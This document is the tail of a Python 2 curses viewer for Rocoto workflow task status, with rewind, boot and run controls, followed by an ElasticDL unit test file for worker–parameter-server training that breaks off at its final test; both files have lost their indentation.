if send_html_to_rzdm:
print 'sending html files to rzdm using rsync ...'
cmd=batchexe('rsync')['-avzr','--delete', html_output_dir, rzdm_path]
stat=runstr(cmd)
if stat is None:
print 'warning rsync to %s failed'%html_output_dir
sys.exit(-1)
else:
print 'done'
sys.exit(0)
else:
# Main Curses Screen Loop
# Write to curses screen when HTML is not outputted
highlight_CYCLE = False
highlight_WORKFLOW = False
get_execute_task_track = False
screen.clear()
global screen_resized
selected_tasks = collections.defaultdict(list)
selected_meta_tasks = collections.defaultdict(list)
execute_metatask = None
colapsed_metatask = None
task = 0
while True:
if not check_file(workflow_file) or not check_file(database_file):
curses.endwin()
print;print
print 'rocoto_viwer quit because the Rocoto database or XML file used by this session when missing'
sys.exit(-1)
job_id = None
curses.noecho()
num_columns = default_column_length
if header is None:
header = ' '
if highlight_WORKFLOW:
header_split = header.split('\n')
screen.addstr(0,0,header_split[0]+'\n')
screen.addstr(header_split[1],curses.A_STANDOUT)
else:
screen.addstr(0,0,header)
if update_pad is True:
num_lines = len(rocoto_stat[cycle])
line_correction = 0
for count_meta_tasks in meta_tasks[cycle]:
if count_meta_tasks[1] and metatasks_state_cycle[cycle][ count_meta_tasks[0] ]:
line_correction += len(count_meta_tasks[2]) - 1
num_lines -= line_correction
update_pad = False
if mlines > num_lines:
pad = curses.newpad(mlines ,num_columns)
else:
pad = curses.newpad(num_lines+1 ,num_columns)
line_number = -1
for line_num,line in enumerate(rocoto_stat[cycle]):
#debug.write('DISPLAY LINE: '+line+'\n')
colapsed_metatask = False
columns = line.split()
count_columns = line.split(' ')
spaces = []
for c,sub_group in groupby(count_columns):
if c != '': continue
spaces.append(' '*len(list(sub_group)))
spaces.append('')
text_color = {'SUCCEEDED':3,'QUEUED':4,'DEAD':2,'FAILED':2,'RUNNING':6}
skip_task = False
if not meta_tasks[cycle][line_num][1] and metatasks_state_cycle[cycle][ meta_tasks[cycle][line_num][2] ] :
skip_task = True
else:
line_number +=1
if use_performance_metrics and len(columns) == 7:
for i in range(0,4):
columns.append('-')
for i,column in enumerate(columns):
if skip_task: continue
if not use_performance_metrics and i > 7: continue
execute_cycle = columns[0]
if i == 0:
if meta_tasks[cycle][line_num][1]:
if metatasks_state_cycle[cycle][columns[1]]:
if highlight_CYCLE:
pad.addstr(column, curses.A_STANDOUT)
else:
pad.addstr(column)
pad.addstr(' < ')
colapsed_metatask = True
if update_metatask_state_status_message or len(metatasks_state_string_cycle[cycle][ columns[1] ])==0:
get_state_list = []
total_numer_of_tasks = len(meta_tasks[cycle][line_num][2])
for check_metatask_line in rocoto_stat[cycle]:
split_check_metatask_line = check_metatask_line.split()
for each_metatask in meta_tasks[cycle][line_num][2]:
if each_metatask == split_check_metatask_line[1]:
get_state_list.append(split_check_metatask_line[3])
red_override = False
metatask_state = columns[3]
if 'SUCCEEDED' in get_state_list:
metatask_state = '(%d/%d) SUCCEEDED'%(get_state_list.count('SUCCEEDED'),total_numer_of_tasks)
if 'QUEUED' in get_state_list:
metatask_state = '(%d/%d) QUEUED'%(get_state_list.count('QUEUED'),total_numer_of_tasks)
if 'RUNNING' in get_state_list:
metatask_state = '(%d/%d) RUNNING'%(get_state_list.count('RUNNING'),total_numer_of_tasks)
if 'FAILED' in get_state_list:
metatask_state = '(%d/%d) FAILED'%(get_state_list.count('FAILED'),total_numer_of_tasks)
red_override = True
if 'DEAD' in get_state_list:
red_override = True
metatask_state = '(%d/%d) DEAD'%(get_state_list.count('DEAD'),total_numer_of_tasks)
metatasks_state_string_cycle[cycle][ columns[1] ] = metatask_state
else:
if highlight_CYCLE:
pad.addstr(column, curses.A_STANDOUT)
else:
pad.addstr(column)
pad.addstr(' > ')
else:
if highlight_CYCLE:
pad.addstr(column,curses.A_STANDOUT)
pad.addstr(' ')
else:
pad.addstr(column+' ')
elif i == 1:
save_column = column
if colapsed_metatask:
column = metatask_name[column]
display_column = (column if len(column) < 19 else column[:19])
if line_number == task and not highlight_CYCLE and not highlight_WORKFLOW :
pad.addstr(display_column,curses.A_STANDOUT)
execute_task_track = save_column
if colapsed_metatask:
execute_metatask_check = True
execute_metatask = column
metatask_list_of_selected_metatask = meta_tasks[cycle][line_num][2]
else:
execute_metatask_check = False
execute_metatask = None
metatask_list_of_selected_metatask = None
execute_task = column
else:
#if column in metatask_list_by_name[metatask_name[column]]:
# display_column = ' '+display_column
if column in selected_tasks[execute_cycle]:
pad.addstr(display_column, highlightSelectedText )
elif column in selected_meta_tasks[execute_cycle]:
pad.addstr(display_column, highlightSelectedText )
else:
pad.addstr(display_column)
pad.addstr(' '*(21-len(display_column)))
elif i == 2:
job_id = column.strip()
if len(job_id) > 9:
job_id = job_id[:9]
if job_id == '-':
pad.addstr(job_id+' '*9)
else:
pad.addstr(job_id+' '*(10-len(job_id)))
elif i == 3:
if meta_tasks[cycle][line_num][1] and len(metatasks_state_string_cycle[cycle][ columns[1] ].split())!=1 and metatasks_state_cycle[cycle][columns[1]]:
column = metatasks_state_string_cycle[cycle][ columns[1] ]
if red_override:
the_text_color = 2
else:
the_text_color = text_color[column.split()[1]]
if len(column) >= 15:
pad.addstr( column[:15],curses.color_pair(the_text_color)|curses.A_STANDOUT)
column = column[:15]
else:
pad.addstr( column,curses.color_pair(the_text_color)|curses.A_STANDOUT)
elif column in text_color:
pad.addstr(column, curses.color_pair(text_color[column])|curses.A_STANDOUT)
else:
pad.addstr(column)
pad.addstr(' '*(16-len(column)),curses.color_pair(8))
elif i in (4,5,6,7,8,9,10):
if len(column) < 8:
pad.addstr(column+' '*(8-len(column)))
else:
pad.addstr(column.strip()+' ')
if not skip_task:
pad.addstr('\n')
update_metatask_state_status_message = False
pad.refresh( pad_pos, 0, 2,0, mlines-4,mcols)
entire_workflow = 'Hit <ENTER> to open cycle based information page (implementation pending)'
entire_cycle = '********* The ENTIRE CYCLE has been selected for an action **********'
try:
if highlight_WORKFLOW:
screen.addstr(mlines-2,0,entire_workflow,curses.A_BOLD)
else:
screen.addstr(mlines-2,0,' '*len(entire_workflow))
if highlight_CYCLE:
screen.addstr(mlines-2,0,entire_cycle,curses.A_BOLD)
elif not highlight_WORKFLOW:
screen.addstr(mlines-2,0,' '*len(entire_cycle))
if pad_pos < num_lines-mlines+4 or pad_pos > 0:
screen.addstr(mlines-1,0,' '*len(bottom_message_scroll))
screen.addstr(mlines-1,0,bottom_message_scroll,curses.A_BOLD)
else:
screen.addstr(mlines-1,0,' '*len(bottom_message_scroll))
screen.addstr(mlines-1,0,bottom_message,curses.A_BOLD)
except:
std_time.sleep(1)
pass
if num_columns > mcols:
curses.endwin()
print
print 'Your terminal is only %s characters must be at least %s to display workflow status'%(str(mcols),str(num_columns))
sys.exit(-1)
if loading_stat:
dot_stat = (0 if dot_stat == len(dots)-1 else dot_stat+1 )
screen.addstr(mlines-2,0,'Running rocotostat ')
screen.addstr(mlines-2,20,dots[dot_stat])
try:
rocoto_stat_tmp = queue_stat.get_nowait()
except:
rocoto_stat_tmp = ''
if len(rocoto_stat_tmp) != 0:
(rocoto_stat, tasks_ordered, metatask_list,cycledef_group_cycles) = rocoto_stat_tmp
process_get_rocoto_stat.join()
process_get_rocoto_stat.terminate()
update_pad = True
loading_stat = False
rocoto_stat_tmp = ''
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
header = header_string
header = header.replace('t'*16,stat_update_time)
header = header.replace('pslot',PSLOT)
reduce_header_size = int((len(PSLOT)-len('PSLOT'))/2)
if reduce_header_size > 0:
header = header[:-reduce_header_size]
header = header[reduce_header_size:]
screen.addstr(mlines-2,0,'Updated new rocotostatus: %s'%stat_update_time+' '*48)
screen.refresh()
std_time.sleep(0.5)
screen.addstr(mlines-2,0,' '*100)
screen.refresh()
if loading_check:
if time() - current_check_time > 5:
dot_check = (0 if dot_check == len(dots)-1 else dot_check+1 )
loc = (0 if not loading_stat else 27)
screen.addstr(mlines-2,loc,'Running rocotocheck ')
screen.addstr(mlines-2,loc+20,dots[dot_check])
try:
rocoto_check = queue_check.get_nowait()
except:
pass
if len(rocoto_check) != 0:
process_get_rocoto_check.join()
process_get_rocoto_check.terminate()
loading_check = False
if time() - current_check_time > 5:
event = screen.getch()
time_inc = 0.0
while event != curses.KEY_ENTER and event != 10:
message_string = 'rocotocheck for %s %s is ready for vieweing'%(params_check[2],params_check[3])
message_string = (message_string if len(message_string) < mcols else message_string[:mcols-1])
time_inc += 1
if time_inc > 4:
screen.addstr(mlines-2,0, message_string)
screen.addstr(mlines-2,len(message_string),' ')
time_inc = 0.0
else:
screen.addstr(mlines-2,0,message_string)
screen.addstr(mlines-2,len(message_string),' <Hit Enter>',curses.A_BOLD)
event = screen.getch()
display_results(rocoto_check,screen,params_check)
rocoto_check = ''
curses.curs_set(0)
curses.halfdelay(2)
screen.keypad(1)
event = screen.getch()
if event in (curses.KEY_LEFT, curses.KEY_RIGHT):
highlight_CYCLE = False
highlight_WORKFLOW = False
if event == curses.KEY_LEFT:
pad_pos = 0
#debug.write('KEY_LEFT %s\n'%pad_pos)
if cycle - 1 >= 0:
cycle -= 1
elif event == curses.KEY_RIGHT:
pad_pos = 0
#debug.write('KEY_RIGHT %s\n'%pad_pos)
if cycle + 1 < num_cycle:
cycle += 1
num_lines = len(rocoto_stat[cycle])
line_correction = 0
for count_meta_tasks in meta_tasks[cycle]:
if count_meta_tasks[1] and metatasks_state_cycle[cycle][ count_meta_tasks[0] ]:
line_correction += len(count_meta_tasks[2])-1
num_lines -= line_correction
if task > num_lines-1:
task = num_lines-1
update_pad = True
if event == ord('Q'):
break
if get_execute_task_track:
get_execute_task_track = False
if execute_task_track in metatasks_state_cycle[cycle]:
metatasks_state_cycle[cycle][execute_task_track] = not metatasks_state_cycle[cycle][execute_task_track]
update_metatask_state_status_message = True
update_pad = True
if event == curses.KEY_MOUSE:
mouse_id, mouse_x, mouse_y, mouse_z, button_state = curses.getmouse()
task_mouse_pos = pad_pos+mouse_y-2
if task_mouse_pos >= 0 and task_mouse_pos < num_lines:
task = task_mouse_pos
update_pad = True
if button_state & curses.BUTTON1_DOUBLE_CLICKED and mouse_x in range(12,15):
get_execute_task_track = True
if event == ord('x'):
if execute_task_track in metatasks_state_cycle[cycle]:
metatasks_state_cycle[cycle][execute_task_track] = not metatasks_state_cycle[cycle][execute_task_track]
update_metatask_state_status_message = True
update_pad = True
if screen_resized:
screen.erase()
screen.refresh()
update_pad = True
task = pad_pos
screen_resized = False
curses.resizeterm(mlines, mcols)
#debug.write('SCREEN RESIZED %s (%d,%d)\n'%(pad_pos,mlines,mcols))
if mcols < default_column_length:
curses.endwin()
print
print 'Your terminal is only %d characters must be at least %d to display workflow status'%(mcols,default_column_length)
sys.exit(-1)
elif event in ( curses.KEY_NPAGE, ord('d') ):
highlight_CYCLE = False
highlight_WORKFLOW = False
if pad_pos + mlines < num_lines-mlines+5:
pad_pos += mlines - 5
task += mlines - 5
else:
pad_pos = num_lines-mlines+5
task = num_lines-1
update_pad = True
elif event in ( curses.KEY_PPAGE, ord('u') ):
highlight_CYCLE = False
highlight_WORKFLOW = False
if pad_pos != 0:
if pad_pos - mlines > 0:
pad_pos -= mlines - 5
if task > pad_pos+mlines-6:
task -= mlines - 5
else:
pad_pos = 0
task = 0
update_pad = True
elif event in (curses.KEY_UP, curses.KEY_SR):
if task == 0:
if highlight_CYCLE:
highlight_CYCLE = False
highlight_WORKFLOW = True
if not highlight_WORKFLOW:
highlight_CYCLE = True
if task != pad_pos:
update_pad = True
task -= 1
elif pad_pos != 0:
pad_pos -= 1
task -= 1
if event == curses.KEY_SR:
if execute_metatask_check:
if execute_metatask in selected_meta_tasks[execute_cycle]:
if len(selected_meta_tasks[execute_cycle]) > 0:
selected_meta_tasks[execute_cycle].remove(execute_metatask)
else:
selected_meta_tasks[execute_cycle].append(execute_metatask)
else:
if execute_task in selected_tasks[execute_cycle]:
if len(selected_tasks[execute_cycle]) > 0:
selected_tasks[execute_cycle].remove(execute_task)
else:
selected_tasks[execute_cycle].append(execute_task)
update_pad = True
elif event in ( curses.KEY_DOWN, curses.KEY_SF ):
if highlight_CYCLE or highlight_WORKFLOW:
task = -1
highlight_CYCLE = False
highlight_WORKFLOW = False
if task != num_lines-1 and task < pad_pos+mlines-6:
task += 1
elif pad_pos < num_lines-mlines+5:
pad_pos += 1
task += 1
if event == curses.KEY_SF:
if execute_metatask_check:
if execute_metatask in selected_meta_tasks[execute_cycle]:
if len(selected_meta_tasks[execute_cycle]):
selected_meta_tasks[execute_cycle].remove(execute_metatask)
else:
selected_meta_tasks[execute_cycle].append(execute_metatask)
else:
if execute_task in selected_tasks[execute_cycle]:
if len(selected_tasks[execute_cycle]) > 0:
selected_tasks[execute_cycle].remove(execute_task)
else:
selected_tasks[execute_cycle].append(execute_task)
update_pad = True
elif event == ord('c'):
if loading_check == True:
screen.addstr(mlines-2,0,'rocotocheck is all reading running ')
screen.refresh()
std_time.sleep(0.5)
screen.addstr(mlines-2,0,' '*100)
screen.refresh()
else:
loc = (0 if not loading_stat else 27)
screen.addstr(mlines-2,loc,'Running rocotocheck ')
screen.refresh()
params_check = (workflow_file, database_file, execute_task, execute_cycle, 'check')
process_get_rocoto_check = Process( target=get_rocoto_check, args=[params_check, queue_check] )
process_get_rocoto_check.start()
loading_check = True
current_check_time = time()
elif event == ord('f'):
log_file = ''
for find_task in tasks_ordered:
if find_task[0] == execute_task:
log_file = find_task[2].replace('CYCLE', execute_cycle[:-2] )
if check_file(log_file):
links = []
links.append(log_file)
try:
make_symlinks_in(links,EXPDIR,force=True)
except:
pass
elif event in (curses.KEY_ENTER, 10, 13):
if execute_metatask_check:
selected_tasks[execute_cycle] = list_selector( screen, selected_tasks[execute_cycle], metatask_list_of_selected_metatask )
screen.erase()
else:
if execute_task in selected_tasks[execute_cycle]:
if len(selected_tasks[execute_cycle]) > 0:
selected_tasks[execute_cycle].remove(execute_task)
else:
selected_tasks[execute_cycle].append(execute_task)
elif event == ord('r'):
screen.clear()
process = ''
if highlight_CYCLE:
screen.addstr('Are you sure you want to rewind all the tasks in the cycle %s by running:\n\n'%execute_cycle)
process = '-a'
#highlight_WORKFLOW = False
elif execute_metatask_check and len(selected_tasks[execute_cycle]) == 0:
for tasks in metatask_list_of_selected_metatask:
process += '-t ' + tasks+' '
screen.addstr('Are you sure you want to rewind all the tasks in the metatask (%s) by running:\n\n'%execute_task)
elif len(selected_tasks[execute_cycle]) != 0 or len(selected_meta_tasks[execute_cycle]) != 0:
if len(selected_tasks[execute_cycle]) != 0:
selected_tasks_string = ''
screen.addstr('Selected tasks:\n\n')
for tasks in selected_tasks[execute_cycle]:
selected_tasks_string += tasks+'\t'
process += '-t ' + tasks+' '
screen.addstr(selected_tasks_string+'\n\n')
if len(selected_meta_tasks[execute_cycle]) != 0:
selected_tasks_string = ''
screen.addstr('Selected %d entire meta-tasks and their tasks:\n\n'%len( selected_meta_tasks[execute_cycle]))
for meta_task_selected in selected_meta_tasks[execute_cycle]:
for tasks in metatask_list_by_name[meta_task_selected]:
selected_tasks_string += tasks+'\t'
process += '-t ' + tasks+' '
screen.addstr(selected_tasks_string+'\n\n')
screen.addstr('\nAre you sure you want to rewind all these seleted tasks by running:\n\n')
elif len(selected_tasks[execute_cycle]) == 0:
process = '-t '+ execute_task
screen.addstr('Are you sure you want to rewind the single task %s by running:\n\n'%execute_task)
screen.addstr('rocotorewind -c %s -d %s -w %s %s\n\n'%(execute_cycle,basename(database_file),basename(workflow_file),process))
screen.addstr('Enter: <Y>es or <N>o',curses.A_BOLD)
while True:
event = screen.getch()
if event == ord('y') or event == ord('Y'):
params = (workflow_file, database_file, execute_cycle,process)
results = rocoto_rewind(params)
results_params = ('','','rewind',execute_cycle,'tasks')
try:
display_results(results,screen,results_params)
except:
screen.addstr('\n\nRewind of this job was successful but displaying of the stdout failed\n')
screen.addstr('Output has been written out to the file rocotorewind_output.log\n')
screen.addstr('Press <ENTER> to continue')
with open('rocotorewind_output.log','a') as rocotorewind_logfile:
rocotorewind_logfile.write('\n\n'+results)
while True:
event = screen.getch()
if event in (curses.KEY_ENTER, 10, 13):
break
selected_tasks[execute_cycle] = []
break
elif event == ord('n') or event == ord('N'):
break
screen.clear()
update_pad = True
elif event == ord('U'):
selected_tasks[execute_cycle] = []
selected_meta_tasks[execute_cycle] = []
update_pad = True
elif event == ord('b'):
process = ''
screen.clear()
list_meta_tasks = ''
list_of_tasks = ''
boot_task_list = '' ; tasks_to_boot = []
boot_metatask_list = '' ; metatasks_to_boot = []
if highlight_CYCLE:
screen.addstr('You have selected to boot the entire cycle %s:\n\n'%execute_cycle,curses.A_BOLD)
metatasks_to_boot = metatask_list_per_cycle[cycle]
tasks_to_boot = tasks_in_cycle[cycle]
elif len(selected_tasks[execute_cycle]) != 0 or len(selected_meta_tasks[execute_cycle]) != 0:
screen.addstr('You have a list selected tasks and/or metatasks to boot:\n\n',curses.A_BOLD)
metatasks_to_boot = selected_tasks[execute_cycle]
tasks_to_boot = selected_tasks[execute_cycle]
elif execute_metatask_check:
screen.addstr('Are you sure you want boot the entire meta task %s by running:\n\n'%execute_metatask)
metatasks_to_boot.append(execute_metatask)
elif len(selected_tasks[execute_cycle]) == 0:
tasks_to_boot.append(execute_task)
screen.addstr('Are you sure you want boot the task %s by running rocotoboot with:'%execute_task)
else:
update_pad = True
continue
if len(metatasks_to_boot) > 0:
list_meta_tasks = ' '
screen.addstr('Metatasks selected in cycle:\n\n',curses.A_BOLD)
for meta_task in metatasks_to_boot:
list_meta_tasks += meta_task+' '
boot_metatask_list += meta_task+','
boot_metatask_list = boot_metatask_list[:-1]
screen.addstr( list_meta_tasks )
if len(tasks_to_boot) > 0:
list_of_tasks = ' '
screen.addstr('\n\nTasks selected in cycle:\n\n',curses.A_BOLD)
for a_task in tasks_to_boot:
list_of_tasks += a_task+' '
boot_task_list += a_task+','
boot_task_list = boot_task_list[:-1]
screen.addstr( list_of_tasks )
screen.addstr('\n\nAre you sure you want to boot all the tasks and/or metatasks in the cycle %s by running:\n\n'%execute_cycle,curses.A_BOLD)
if len(boot_metatask_list) != 0:
list_meta_tasks = '--metatasks '+"'"+boot_metatask_list+"'"
if len(boot_task_list) != 0:
list_of_tasks = ' --tasks '+"'"+boot_task_list+"'"
screen.addstr('rocotoboot -d %s -w %s %s\n\n'%(basename(database_file),basename(workflow_file),list_meta_tasks+list_of_tasks))
screen.addstr('Enter: <Y>es or <N>o',curses.A_BOLD)
while True:
event = screen.getch()
if event == ord('y') or event == ord('Y'):
params = (workflow_file, database_file, execute_cycle, boot_metatask_list, boot_task_list)
results = rocoto_boot(params)
display_results(results,screen,('','',execute_cycle,'rocotoboot_output'))
break
elif event == ord('n') or event == ord('N'):
break
screen.clear()
update_pad = True
elif event == ord('R'):
screen.addstr(mlines-2,0,'Running rocotorun and rocotostat ...'+' '*60,curses.A_BOLD)
params = (workflow_file, database_file)
rocoto_run(params)
update_pad = True
screen.clear()
if loading_stat == True:
screen.addstr(mlines-2,0,'rocotostat is all reading running'+' '*60)
screen.refresh()
std_time.sleep(0.5)
else:
start_time = 0
elif event == ord('/'):
curses.echo()
find_next = 1
screen.addstr(mlines-3,0,' '*100)
screen.refresh()
screen.addstr(mlines-3,0,'/')
screen.refresh()
search_string = screen.getstr(mlines-3,1,50)
break_twice = False
screen.addstr(mlines-3,0,' '*100)
screen.refresh()
for every_cycle in range(0,len(rocoto_stat)):
for line_number,line in enumerate(rocoto_stat[every_cycle]):
if search_string in line:
task = line_number
if num_lines < mlines:
pad_pos = 0
else:
pad_pos = task
update_pad = True
cycle = every_cycle
break_twice = True
break
if break_twice:
screen.clear()
break
else:
find_next = 1
elif (event == ord('n') or event == ord('N')) and len(search_string) != 0:
if event == ord('n'):
find_next += 1
else:
if find_next - 1 >= 1:
find_next -= 1
found_next = 0
break_twice = False
for every_cycle in range(0,len(rocoto_stat)):
for line_number,line in enumerate(rocoto_stat[every_cycle]):
if search_string in line:
found_next += 1
if find_next == found_next:
task = line_number
if num_lines < mlines:
pad_pos = 0
else:
pad_pos = task
update_pad = True
cycle = every_cycle
break_twice = True
break
if break_twice:
screen.clear()
break
if not break_twice:
find_next = 1
elif event == ord('F'):
for find_cycle in range(0,len(rocoto_stat)):
for lines in rocoto_stat[find_cycle]:
if 'RUNNING' in line:
break
break
if find_cycle > 1:
cycle = find_cycle - 2
update_pad = True
elif event == ord('l'):
start_time -= stat_read_time_delay
elif event == ord('h'):
update_pad = True
help_screen(screen)
screen.clear()
current_time = time()
diff = current_time - start_time
if diff > stat_read_time_delay and not loading_stat:
start_time = current_time
if not use_multiprocessing:
params = (workflow_file, database_file, tasks_ordered, metatask_list,cycledef_group_cycles)
(rocoto_stat, tasks_ordered, metatask_list,cycledef_group_cycles) = get_rocoto_stat( params, Queue() )
stat_update_time = str(datetime.datetime.now()).rsplit(':',1)[0]
header = header_string
header = header.replace('t'*16,stat_update_time)
header = header.replace('pslot',PSLOT)
reduce_header_size = int((len(PSLOT)-len('PSLOT'))/2)
if reduce_header_size > 0:
header = header[:-reduce_header_size]
header = header[reduce_header_size:]
update_pad = True
screen.clear()
else:
loading_stat = True
screen.addstr(mlines-2,0,'Running rocotostat ')
params = (workflow_file, database_file, tasks_ordered, metatask_list,cycledef_group_cycles)
process_get_rocoto_stat = Process( target=get_rocoto_stat, args=[params, queue_stat] )
process_get_rocoto_stat.start()
if use_multiprocessing:
if process_get_rocoto_stat is not None:
if process_get_rocoto_stat.is_alive():
process_get_rocoto_stat.terminate()
if process_get_rocoto_check is not None:
if process_get_rocoto_check.is_alive():
process_get_rocoto_check.terminate()
#debug.close()
if __name__ == '__main__':
if not load_produtil_pythonpath():
print '\n\nCRITICAL ERROR: The produtil package could not be loaded from your system'
sys.exit(-1)
from produtil.fileop import remove_file
try:
signal.signal(signal.SIGWINCH, sigwinch_handler)
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
if sys.stdin.isatty():
curses.wrapper(main)
else:
screen = 'dummy'
main(screen)
remove_file(temp_workflow_file)
except KeyboardInterrupt:
print "Got KeyboardInterrupt exception. Exiting..."
sys.exit(-1)
|
worker_ps_interaction_test.py
|
import os
import unittest
from threading import Thread
import numpy as np
import tensorflow as tf
from elasticdl.proto import elasticdl_pb2
from elasticdl.python.common.args import parse_worker_args
from elasticdl.python.common.constants import DistributionStrategy
from elasticdl.python.common.hash_utils import int_to_id, string_to_id
from elasticdl.python.common.model_utils import get_model_spec
from elasticdl.python.ps.embedding_table import EmbeddingTable
from elasticdl.python.tests.test_utils import (
create_pserver,
get_frappe_dataset,
get_mnist_dataset,
get_random_batch,
)
from elasticdl.python.worker.worker import Worker
class WorkerPSInteractionTest(unittest.TestCase):
def setUp(self):
self._model_zoo_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "../../../model_zoo"
)
self._batch_size = 16
self._channels = []
self._pservers = []
self._workers = []
def tearDown(self):
for pserver in self._pservers:
pserver.server.stop(0)
def _create_pserver(self, model_def, num):
self._ports, self._channels, self._pservers = create_pserver(
self._model_zoo_path,
model_def,
grads_to_wait=1,
use_async=True,
num_ps_pods=num,
)
self._model_def = model_def
def _reset_pserver(self):
for ps in self._pservers:
ps.parameters.reset()
def _create_worker(self, worker_num):
for i in range(worker_num):
tf.keras.backend.clear_session()
tf.random.set_seed(22)
arguments = [
"--worker_id",
i,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
self._model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
worker = Worker(args, ps_channels=self._channels)
self._workers.append(worker)
def _worker_train(
self, worker_id, train_db, test_db, stop_step, use_tf_function=False
):
worker = self._workers[worker_id]
acc_meter = tf.keras.metrics.Accuracy()
worker_results = []
for step, (x, y) in enumerate(train_db):
if step == 0:
worker._run_model_call_before_training(x)
worker.get_model()
if use_tf_function:
w_loss, w_grads = worker.training_process_with_acceleration(
x, y
)
else:
w_loss, w_grads = worker.training_process_eagerly(x, y)
worker.report_gradient(w_grads)
if step % 20 == 0:
worker.get_model()
for (x, y) in test_db:
out = worker.forward_process(x)
if "mnist" in self._model_def:
acc_meter.update_state(tf.argmax(out, axis=1), y)
else:
out["probs"] = tf.reshape(out["probs"], [-1])
acc_meter.update_state(
tf.where(
out["probs"] < 0.5,
x=tf.zeros_like(y),
y=tf.ones_like(y),
),
y,
)
worker_results.append(
(float(w_loss.numpy()), float(acc_meter.result().numpy()))
)
acc_meter.reset_states()
if step > stop_step:
break
return worker_results
def _test_deepfm_train(self, num_ps, num_worker, stop_step):
model_def = "deepfm_functional_api.deepfm_functional_api.custom_model"
self._create_pserver(model_def, num_ps)
db, test_db = get_frappe_dataset(self._batch_size)
self._create_worker(num_worker)
threads = []
for w in range(num_worker):
t = Thread(
target=self._worker_train, args=(w, db, test_db, stop_step)
)
t.start()
threads.append(t)
for t in threads:
t.join()
def test_worker_pull_embedding(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
self._create_pserver(model_def, 2)
arguments = [
"--worker_id",
0,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
worker = Worker(args, ps_channels=self._channels)
# Test lookup embedding vectors that do not exist
layers = ["test-2", "test-2-slot"]
ids = [3, 5, 1, 6, 10, 2, 1, 2, 4, 7, 9]
embedding_table_args = [
(layers[0], 8, "uniform", False),
(layers[1], 8, 3.3, True),
]
# initialize embedding table object
for pserver in self._pservers:
for layer, table_args in zip(layers, embedding_table_args):
pserver.parameters.embedding_params[layer] = EmbeddingTable(
*table_args
)
result_dict = {}
for layer in layers:
embedding = worker.pull_embedding_vector(layer, ids)
result_dict[layer] = embedding
for layer in layers:
expected_result = []
for embedding_id in ids:
ps_id = int_to_id(embedding_id, len(self._pservers))
table = self._pservers[ps_id].parameters.embedding_params[
layer
]
expected_result.append(table.get([embedding_id]))
expected_result = np.concatenate(expected_result)
self.assertTrue(np.allclose(expected_result, result_dict[layer]))
def test_compare_onebatch_train(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
self._create_pserver(model_def, 2)
images, labels = get_random_batch(self._batch_size)
# TODO(yunjian.lmh): test optimizer wrapper
arguments = [
"--worker_id",
0,
"--job_type",
elasticdl_pb2.TRAINING,
"--minibatch_size",
self._batch_size,
"--model_zoo",
self._model_zoo_path,
"--model_def",
model_def,
"--distribution_strategy",
DistributionStrategy.PARAMETER_SERVER,
]
args = parse_worker_args(arguments)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
worker = Worker(args, ps_channels=self._channels)
worker._run_model_call_before_training(images)
worker.get_model()
w_loss, w_grads = worker.training_process_eagerly(images, labels)
worker.report_gradient(w_grads)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
(
model,
dataset_fn,
loss_fn,
opt_fn,
eval_metrics_fn,
prediction_outputs_processor,
create_data_reader_fn,
) = get_model_spec(
model_zoo=self._model_zoo_path,
model_def=model_def,
dataset_fn="dataset_fn",
model_params=None,
loss="loss",
optimizer="optimizer",
eval_metrics_fn="eval_metrics_fn",
prediction_outputs_processor="PredictionOutputsProcessor",
custom_data_reader="custom_data_reader",
)
with tf.GradientTape() as tape:
output = model.call(images, training=True)
labels = tf.reshape(labels, [-1])
loss = loss_fn(labels, output)
grads = tape.gradient(loss, model.trainable_variables)
opt_fn().apply_gradients(zip(grads, model.trainable_variables))
for v in model.trainable_variables:
ps_id = string_to_id(v.name, len(self._channels))
ps_v = self._pservers[ps_id].parameters.get_non_embedding_param(
v.name
)
np.testing.assert_array_equal(ps_v.numpy(), v.numpy())
def test_compare_mnist_train(self):
model_def = "mnist_functional_api.mnist_functional_api.custom_model"
self._create_pserver(model_def, 2)
db, test_db = get_mnist_dataset(self._batch_size)
stop_step = 20
self._create_worker(1)
worker_results = self._worker_train(
0, train_db=db, test_db=test_db, stop_step=stop_step
)
tf.keras.backend.clear_session()
tf.random.set_seed(22)
acc_meter = tf.keras.metrics.Accuracy()
(
model,
dataset_fn,
loss_fn,
opt_fn,
eval_metrics_fn,
prediction_outputs_processor,
create_data_reader_fn,
) = get_model_spec(
model_zoo=self._model_zoo_path,
model_def=model_def,
dataset_fn="dataset_fn",
model_params=None,
loss="loss",
optimizer="optimizer",
eval_metrics_fn="eval_metrics_fn",
prediction_outputs_processor="PredictionOutputsProcessor",
custom_data_reader="custom_data_reader",
)
local_results = []
for step, (x, y) in enumerate(db):
with tf.GradientTape() as tape:
out = model.call(x, training=True)
ll = loss_fn(y, out)
grads = tape.gradient(ll, model.trainable_variables)
opt_fn().apply_gradients(zip(grads, model.trainable_variables))
if step % 20 == 0:
for (x, y) in test_db:
out = model.call(x, training=False)
acc_meter.update_state(tf.argmax(out, axis=1), y)
local_results.append(
(float(ll.numpy()), float(acc_meter.result().numpy()))
)
acc_meter.reset_states()
if step > stop_step:
break
for w, l in zip(worker_results, local_results):
self.assertTupleEqual(w, l)
def test_deepfm_train(self):
model_def = "deepfm_functional_api.deepfm_functional_api.custom_model"
self._create_pserver(model_def, 2)
db, test_db = get_frappe_dataset(self._batch_size)
self._create_worker(1)
worker_results = self._worker_train(
0, train_db=db, test_db=test_db, stop_step=100
)
acc = max([r[1] for r in worker_results])
self.assertLess(0.65, acc)
def test_deepfm_two_worker_train(self):
num_ps = 2
num_worker = 2
stop_step = 10
self._test_deepfm_train(num_ps, num_worker, stop_step)
def test_deepfm_four_worker_train(self):
num_ps = 4
num_worker = 1
stop_step = 10
self._test_deepfm_train(num_ps, num_worker, stop_step)
def test_restart_ps(self):
